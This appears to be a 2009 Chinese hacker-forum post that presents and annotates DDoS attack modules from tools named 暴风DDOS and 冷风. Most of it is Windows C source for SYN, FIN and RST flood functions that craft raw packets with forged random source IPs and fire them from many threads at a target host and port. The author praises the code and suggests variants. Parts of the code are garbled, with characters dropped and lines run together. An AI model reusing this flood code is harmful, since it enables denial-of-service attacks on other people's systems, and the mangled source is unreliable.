DDOS代码.doc

【原创】对现有的所能找到的DDOS代码(攻击模块)做出一次分析-SYN篇作 者: alalmn时 间: 2009-10-04,02:03链 接: /showthread.php?t=98896/=对现有的所能找到的DDOS代码(攻击模块)做出一次分析-SYN篇分析者:alalmn飞龙 BLOG:/alalmn分析的不好请各位高手见谅花了几个小时分析的呵呵SYN洪水攻击syn flood(SYN洪水攻击)介绍 /alalmn/blog/item/56d5d81f234fae00304e15e8.htmlTcpHeader.th_flag = 2; /0,2,4,8,16,32-FIN,SYN,RST,PSH,ACK,URG /SYN 标志我们可以不可以改变这个值 2是SYN攻击 改成16变成ACK攻击这样可以吗我刚才还在想这个问题 暴风DDOSVIP2010-225源代码.h 源码里就已经写到了呵呵爽啊暴风DDOSVIP2010-225源代码.h SYN(流量) 我觉得写得非常好真的个人看法QQ:316118740/=冷风的.htypedef struct tcphdr /定义TCP首部USHORT th_sport; /16位源端口USHORT th_dport; /16位目的端口unsigned int th_seq; /32位序列号unsigned int th_ack; /32位确认号unsigned char th_lenres; /4位首部长度+6位保留字中的4位unsigned char th_flag; /2位保留字+6位标志位USHORT th_win; /16位窗口大小USHORT th_sum; /16位校验和USHORT th_urp; /16位紧急数据偏移量TCP_HEADER;typedef struct _iphdr /ip头 unsigned char h_verlen; /4位首部长度+4位IP版本号 unsigned char tos; /8位服务类型TOS unsigned short total_len; /16位总长度（字节） unsigned short ident; /16位标识 unsigned short frag_and_flags; /3位标志位 unsigned char ttl; /8位生存时间TTL unsigned char proto; /8位协议号(TCP, UDP 或其他) unsigned short checksum; /16位IP首部校验和 unsigned int sourceIP; /32位源IP地址 unsigned int destIP; /32位目的IP地址 IP_HEADER;typedef struct tsd_hdr /定义TCP伪首部 unsigned long saddr; /源地址 unsigned long daddr; /目的地址 char mbz; char ptcl; /协议类型unsigned short tcpl; /TCP长度 PSD_HEADER;/计算校验和USHORT checksum(USHORT *buffer,int size)unsigned long cksum=0;while (size1)cksum+=*buffer+;size-=sizeof(USHORT);if (size)cksum+=*(UCHAR*)buffer;cksum = (cksum 16) + (cksum & 0xffff); cksum += (cksum 16); return (USHORT)(cksum);/*SYN FLOOD*/unsigned long CALLBACK SynFloodFunction(LPVOID dParam) /SYN攻击SOCKET sendSocket; /套接字SOCKADDR_IN Sin; /IP信息结构IP_HEADER ipHeader;TCP_HEADER tcpHeader; PSD_HEADER psdHeader; char szSendBuf1024 = ;if(sendSocket = WSASocket(AF_INET, SOCK_RAW, IPPROTO_RAW, NULL, 0, WSA_FLAG_OVERLAPPED) = INVALID_SOCKET) /创建一个与指定传送服务提供者捆绑的套接口 /INVALID_SOCKET发生错误printf(Socket Setup Error.n); /插口设定错误 return 0; BOOL flag=1; if(setsockopt(sendSocket, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(flag) = SOCKET_ERROR) /设置套接口的选项 设置发送和接收的超时 /SOCKET_ERROR创建错误 printf(Setsockopt IP_HDRINCL Error.n); /Setsockopt IP_HDRINCL错误 return 0; int timeout = 3000; if(setsockopt(sendSocket, SOL_SOCKET, SO_SNDTIMEO, (char *)&timeout, sizeof(timeout) = SOCKET_ERROR) /设置套接口的选项 设置发送和接收的超时 /SOCKET_ERROR创建错误 printf(Setsockopt SO_SNDTIMEO Error.n); /Setsockopt SO_SNDTIMEO错误 return 0; Sin.sin_family = AF_INET; /sin_family 地址家族（必须是AF_INET）Sin.sin_port=htons(DdosPort); /目标端口号（使用网络字节顺序）Sin.sin_addr.S_un.S_addr=resolve(DdosUrl); /目标IP地址char src_ip20 = 0;while(!StopDDosAttack) /是否在攻击状态wsprintf( src_ip, %d.%d.%d.%d, rand() % 250 + 1, rand() % 250 + 1, rand() % 250 + 1, rand() % 250 + 1 ); /格式化字符串 伪造IP/填充IP首部 ipHeader.h_verlen = (44 | sizeof(ipHeader)/sizeof(unsigned long); /高四位IP版本号，低四位首部长度 ipHeader.tos = 0; ipHeader.total_len = htons(sizeof(ipHeader)+sizeof(tcpHeader); /16位总长度（字节） ipHeader.ident = 1; /16位标识 ipHeader.frag_and_flags = 0x40; /3位标志位 ipHeader.ttl = 128; /8位生存时间TTL ipHto = IPPROTO_TCP; /8位协议(TCP,UDP) ipHeader.checksum = 0; /16位IP首部校验和ipHeader.sourceIP = inet_addr(src_ip); /伪IP 伪装自己的IPipHeader.destIP = Sin.sin_addr.s_addr; /目标地址/填充TCP首部 tcpHeader.th_sport = htons( 12121 ); /源端口号 tcpHeader.th_dport = htons( DdosPort ); /目标端口tcpHeader.th_seq = htonl( rand()%900000000 + 1 ); /SYN序列号tcpHeader.th_ack = 0; /ACK序列号置为0 tcpHeader.th_lenres = (sizeof(tcpHeader)/4FIN,SYN,RST,PSH,ACK,URGtcpHeader.th_win = htons(512); /窗口大小tcpHeader.th_sum = 0; /校验tcpHeader.th_urp = 0; /紧急数据偏移量/填充TCP伪首部（用于计算校验和，并不真正发送） psdHeader.saddr = ipHeader.sourceIP; /伪IP 伪装自己的IPpsdHeader.daddr = ipHeader.destIP; /目标地址psdHeader.mbz = 0; psdHeader.ptcl = IPPROTO_TCP; /协议类型psdHeader.tcpl = htons(sizeof(tcpHeader); /TCP长度/计算TCP校验和 /计算TCP校验和，计算校验和时需要包括TCP pseudo header memcpy( szSendBuf, &psdHeader, sizeof(psdHeader) ); memcpy( szSendBuf + sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader) ); tcpHeader.th_sum = checksum( (USHORT *) szSendBuf, sizeof(psdHeader) + sizeof(tcpHeader) );/计算IP检验和 memcpy( szSendBuf, &ipHeader, sizeof(ipHeader) ); memcpy( szSendBuf + sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader) ); memset( szSendBuf + sizeof(ipHeader) + sizeof(tcpHeader), 0, 4 ); /内存空间初始化ipHeader.checksum = checksum( (USHORT *) szSendBuf, sizeof(ipHeader) + sizeof(tcpHeader) );memcpy( szSendBuf, &ipHeader, sizeof(ipHeader) ); /填充发送缓冲区memcpy( szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader) ); /填充发送缓冲区for(int a=0;a1)cksum+=*buffer+;size -=sizeof(USHORT);if(size)cksum += *(UCHAR*)buffer;cksum = (cksum 16) + (cksum & 0xffff);cksum += (cksum 16);return (USHORT)(cksum);/*-*/void finattack() /Fin(流量)srand(unsigned) time(NULL); WSADATA wsaData;WSAStartup(MAKEWORD(2, 2), &wsaData);SOCKET SendSocket; IP_HEADER ip_header; TCP_HEADER tcp_header; PSD_HEADER psd_header;char rawip20=44;char SendBuff100;SendSocket = WSASocket( AF_INET, SOCK_RAW, IPPROTO_RAW, NULL, 0, WSA_FLAG_OVERLAPPED ); if( SendSocket = INVALID_SOCKET ) return;BOOL Flag = TRUE; if( setsockopt(SendSocket, IPPROTO_IP, IP_HDRINCL, (char *)&Flag, sizeof(Flag) = SOCKET_ERROR ) return;int Timeout = 5000; if ( setsockopt(SendSocket, SOL_SOCKET, SO_SNDTIMEO, (char *) &Timeout, sizeof(Timeout) = SOCKET_ERROR ) return;SOCKADDR_IN Sin;Sin.sin_family = AF_INET; Sin.sin_port = tgtPort; Sin.sin_addr.s_addr = inet_addr(tgtIP);ip_header.h_verlen = (44 | sizeof(ip_header)/sizeof(unsigned long); ip_header.tos = 0; ip_header.total_len = htons(sizeof(ip_header)+sizeof(tcp_header); ip_header.ident = 1; ip_header.frag_and_flags = 0x40; ip_header.ttl = rand()%256; ip_to = IPPROTO_TCP; ip_header.checksum = 0; ip_header.sourceIP = inet_addr(rawip); ip_header.destIP = inet_addr(tgtIP);tcp_header.th_sport = htons( rand()%60000 + 1 );tcp_header.th_dport = htons( tgtPort ); tcp_header.th_seq = htonl( rand()%900000000 + 1 ); tcp_header.th_ack = 0; tcp_header.th_lenres = (sizeof(tcp_header)/4FIN,SYN,RST,PSH,ACK,URG 这个地方不一样tcp_header.th_win = htons(512); tcp_header.th_sum = 0; tcp_header.th_urp = 0;psd_header.saddr = ip_header.sourceIP; psd_header.daddr = ip_header.destIP; psd_header.mbz = 0; psd_header.ptcl = IPPROTO_TCP; psd_header.tcpl = htons(sizeof(tcp_header);memcpy(SendBuff,&psd_header,sizeof(psd_header); memcpy(SendBuff+sizeof(psd_header),&tcp_header,sizeof(tcp_header); tcp_header.th_sum=checksum(USHORT*)SendBuff,sizeof(psd_header)+sizeof(tcp_header); memcpy(SendBuff,&ip_header,sizeof(ip_header); memcpy(SendBuff+sizeof(ip_header),&tcp_header, sizeof(tcp_header); memset(SendBuff+sizeof(ip_header)+sizeof(tcp_header),0,4); ip_header.checksum=checksum(USHORT*)SendBuff,sizeof(ip_header)+sizeof(tcp_header);memcpy(SendBuff,&ip_header,sizeof(ip_header); memcpy(SendBuff+sizeof(ip_header),&tcp_header,sizeof(tcp_header);while (1)if (StopFlag = 1)ExitThread(0);return;for(int a=0;ah_addr, hp-h_length);strcpy(tgtIP,inet_ntoa(in);elsestrcpy(tgtIP,ip);port=tgtPort;time=timeout;if (StopFlag = -1)return;StopFlag=-1;for(z=0;zxc;z+)hz=CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)finattack, NULL, 0, NULL);if(timeout!=0)CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)wait_for_end, NULL, 0, NULL);/*-*/void rstattack() /伪造RST协议(流量)srand(unsigned) time(NULL); WSADATA wsaData;WSAStartup(MAKEWORD(2, 2), &wsaData);SOCKET SendSocket; IP_HEADER ip_header; TCP_HEADER tcp_header; PSD_HEADER psd_header;char rawip20=44;char SendBuff100;SendSocket = WSASocket( AF_INET, SOCK_RAW, IPPROTO_RAW, NULL, 0, WSA_FLAG_OVERLAPPED ); if( SendSocket = INVALID_SOCKET ) return;BOOL Flag = TRUE; if( setsockopt(SendSocket, IPPROTO_IP, IP_HDRINCL, (char *)&Flag, sizeof(Flag) = SOCKET_ERROR ) return;int Timeout = 5000; if ( setsockopt(SendSocket, SOL_SOCKET, SO_SNDTIMEO, (char *) &Timeout, sizeof(Timeout) = SOCKET_ERROR ) return;SOCKADDR_IN Sin;Sin.sin_family = AF_INET; Sin.sin_port = tgtPort; Sin.sin_addr.s_addr = inet_addr(tgtIP);ip_header.h_verlen = (44 | sizeof(ip_header)/sizeof(unsigned long); ip_header.tos = 0; ip_header.total_len = htons(sizeof(ip_header)+sizeof(tcp_header); ip_header.ident = 1; ip_header.frag_and_flags = 0x40; ip_header.ttl = rand()%256; ip_to = IPPROTO_TCP; ip_header.checksum = 0; ip_header.sourceIP = inet_addr(rawip); ip_header.destIP = inet_addr(tgtIP);tcp_header.th_sport = htons( rand()%60000 + 1 );tcp_header.th_dport = htons( tgtPort ); tcp_header.th_seq = htonl( rand()%900000000 + 1 ); tcp_header.th_ack = 0; tcp_header.th_lenres = (sizeof(tcp_header)/4FIN,SYN,RST,PSH,ACK,URG 这个地方不一样tcp_header.th_win = htons(512); tcp_header.th_sum = 0; tcp_header.th_urp = 0;psd_header.saddr = ip_header.sourceIP; psd_header.daddr = ip_header.destIP; psd_header.mbz = 0; psd_header.ptcl = IPPROTO_TCP; psd_header.tcpl = htons(sizeof(tcp_header);memcpy(SendBuff,&psd_header,sizeof(psd_header); memcpy(SendBuff+sizeof(psd_header),&tcp_header,sizeof(tcp_header); tcp_header.th_sum=checksum(USHORT*)SendBuff,sizeof(psd_header)+sizeof(tcp_header); memcpy(SendBuff,&ip_header,sizeof(ip_header); memcpy(SendBuff+sizeof(ip_header),&tcp_header, sizeof(tcp_header); memset(SendBuff+sizeof(ip_header)+sizeof(tcp_header),0,4); ip_header.checksum=checksum(USHORT*)SendBuff,sizeof(ip_header)+sizeof(tcp_header);memcpy(SendBuff,&ip_header,sizeof(ip_header); memcpy(SendBuff+sizeof(ip_header),&tcp_header,sizeof(tcp_header);while (1)if (StopFlag = 1)ExitThread(0);return;for(int a=0;ah_addr, hp-h_length);strcpy(tgtIP,inet_ntoa(in);elsestrcpy(tgtIP,ip);port=tgtPort;time=timeout;if (StopFlag = -1)return;StopFlag=-1;for(z=0;zxc;z+)hz=CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)rstattack, NULL, 0, NULL);if(timeout!=0)CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)wait_for_end, NULL, 0, NULL);/*-*/void synattack() /SYN(流量)srand(unsigned) time(NULL); WSADATA wsaData; /这个结构被用来存储 被WSAStartup函数调用后返回的 Windows Sockets 数据WSAStartup(MAKEWORD(2, 2), &wsaData); /确定SOCKET版本SOCKET SendSocket; IP_HEADER ip_header; TCP_HEADER tcp_header; PSD_HEADER psd_header;char rawip20=44; /默认伪IPchar SendBuff100;SendSocket = WSASocket( AF_INET, SOCK_RAW, IPPROTO_RAW, NULL, 0, WSA_FLAG_OVERLAPPED ); /创建一个与指定传送服务提供者捆绑的套接口if( SendSocket = INVALID_SOCKET ) /INVALID_SOCKET发生错误return;BOOL Flag = TRUE; if( setsockopt(SendSocket, IPPROTO_IP, IP_HDRINCL, (char *)&Flag, sizeof(Flag) = SOCKET_ERROR ) /设置套接口的选项 设置发送和接收的超时 /SOCKET_ERROR创建错误return;int Timeout = 5000; if ( setsockopt(SendSocket, SOL_SOCKET, SO_SNDTIMEO, (char *) &Timeout, sizeof(Timeout) = SOCKET_ERROR ) /设置套接口的选项 设置发送和接收的超时 /SOCKET_ERROR创建错误return;SOCKADDR_IN Sin; /IP信息结构Sin.sin_family = AF_INET; /sin_family 地址家族（必须是AF_INET）Sin.sin_port = tgtPort; /目标端口号（使用网络字节顺序）Sin.sin_addr.s_addr = inet_addr(tgtIP); /目标IP地址ip_header.h_verlen = (44 | sizeof(ip_header)/sizeof(unsigned long); /高四位IP版本号，低四位首部长度 ip_header.tos = 0; ip_header.total_len = htons(sizeof(ip_header)+sizeof(tcp_header); /16位总长度（字节） ip_header.ident = 1; /16位标识 ip_header.frag_and_flags = 0x40; /3位标志位ip_header.ttl = rand()%256; /8位生存时间TTL ip_to = IPPROTO_TCP; /8位协议(TCP,UDP) ip_header.checksum = 0; /16位IP首部校验和ip_header.sourceIP = inet_addr(rawip); /伪IP 伪装自己的IPip_header.destIP = inet_addr(tgtIP); /目标地址/填充TCP首部 tcp_header.th_sport = htons( rand()%60000 + 1 ); /源端口号 目标端口 随机产生呵呵很好很高很绝tcp_header.th_dport = htons( tgtPort ); /目标端口tcp_header.th_seq = htonl( rand()%900000000 + 1 ); /SYN序列号tcp_header.th_ack = 0; /ACK序列号置为0tcp_header.th_lenres = (sizeof(tcp_header)/4FIN,SYN,RST,PSH,ACK,URGtcp_header.th_win = htons(512); /窗口大小tcp_header.th_sum = 0; /校验tcp_header.th_urp = 0; /紧急数据偏移量/填充TCP伪首部（用于计算校验和，并不真正发送） psd_header.saddr = ip_header.sourceIP; /伪IP 伪装自己的IPpsd_header.daddr = ip_header.destIP; /目标地址psd_header.mbz = 0; psd_header.ptcl = IPPROTO_TCP; /协议类型psd_header.tcpl = htons(sizeof(tcp_header); /TCP长度while (1)if (StopFlag = 1) /判断攻击状态ExitThread(0);return;for(int a=0;ah_addr, hp-h_length);strcpy(tgtIP,inet_n